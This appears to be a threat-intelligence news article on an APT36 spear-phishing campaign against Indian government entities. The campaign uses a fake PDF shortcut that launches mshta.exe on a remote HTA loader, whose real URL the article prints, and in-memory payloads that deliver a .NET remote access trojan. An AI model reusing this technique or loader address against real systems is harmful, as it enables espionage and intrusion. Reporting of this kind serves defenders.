APT36 Malware Campaign Exploits Windows LNK Files to Target Indian Government Entities
A sophisticated cyber threat group, known as APT36 or Transparent Tribe, has initiated a new malware campaign specifically targeting Indian government and strategic entities. This campaign leverages a well-known but often overlooked vulnerability within Windows operating systems by exploiting LNK shortcut files, posing a significant threat to national security and sensitive data. The group’s tactics, which include spear-phishing and advanced evasion techniques, highlight the persistent and evolving nature of cyber espionage.
The attack commences with meticulously crafted spear-phishing emails designed to appear legitimate. These emails typically contain a ZIP archive, often named something innocuous like “Online JLPT Exam Dec 2025.zip,” playing on themes relevant to official communications or events to entice recipients. The goal is to trick government officials into downloading and extracting the contents of this archive, thereby initiating the infection chain. The use of deceptive file names and themes is a common tactic employed by APT groups to bypass initial security filters and exploit human curiosity.
Upon extraction, users are presented with a file that, to the untrained eye, resembles a standard PDF document named “Online JLPT Exam Dec 2025.pdf.” However, this is a deceptive facade. The file is, in reality, a Windows LNK shortcut file. APT36 employs a double extension trick (.pdf.lnk), which, by default, Windows hides from users even when file extension visibility is enabled. This deliberate obfuscation ensures that the malicious nature of the file remains concealed, making it appear as a harmless document to unsuspecting victims. The file’s unusually large size, exceeding 2MB, is another indicator designed to mimic a genuine PDF, further masking its true identity.
Infection Mechanism and LNK Execution Chain
The underlying mechanism of this attack is revealed by an analysis of the LNK file’s properties. When a victim clicks on the seemingly legitimate PDF shortcut, Windows does not open a document. Instead, it executes `mshta.exe`, a legitimate Windows utility, from the System32 directory. This executable is then passed a remote HTA (HTML Application) script as an argument, which is hosted on a compromised or attacker-controlled server. This execution bypasses typical application restrictions and allows the remote script to run with elevated privileges.
According to analyses by cybersecurity researchers, the target path within the LNK file points to a remote loader located at `https://innlive.in/assets/public/01/jlp/jip.hta`. This HTA script is designed to operate stealthily. It launches in a hidden window, minimizes the browser frame to effectively zero visibility, and then proceeds to decode two primary payload blocks, identified as ‘ReadOnly’ and ‘WriteOnly,’ using custom Base64 and XOR encryption routines. These payloads are injected directly into memory, a technique that makes them harder for traditional signature-based antivirus solutions to detect.
The ‘ReadOnly’ component of the malware is responsible for weakening .NET security checks, thereby creating a more favorable environment for the subsequent stages of the attack. The ‘WriteOnly’ component then loads an encrypted DLL, which serves as a Remote Access Trojan (RAT), directly into the system’s memory. For persistent storage or the exfiltration of further data, a hidden “usb” folder containing a file named `usbsyn.pim` has been observed, likely housing additional encrypted data for later stages of the operation. To maintain the illusion of normalcy, the HTA script also fetches and displays a genuine JLPT exam PDF, ensuring that the user perceives the interaction as regular document viewing while their system is already undergoing a compromise.
This advanced persistent threat (APT) campaign is designed for long-term espionage. The .NET-based RAT provides the attackers with critical capabilities, including remote control over the infected system, extensive data theft, and continuous surveillance. The malware’s ability to operate in memory, utilize trusted Windows tools, and communicate with its command-and-control server over encrypted channels significantly impedes detection and tracing efforts by standard security tools. The implications of such a breach into Indian government entities are severe, potentially leading to the leakage of classified information, strategic intelligence, and disruption of critical services. The ongoing nature of this APT36 threat necessitates heightened vigilance and robust cybersecurity defenses for all targeted organizations.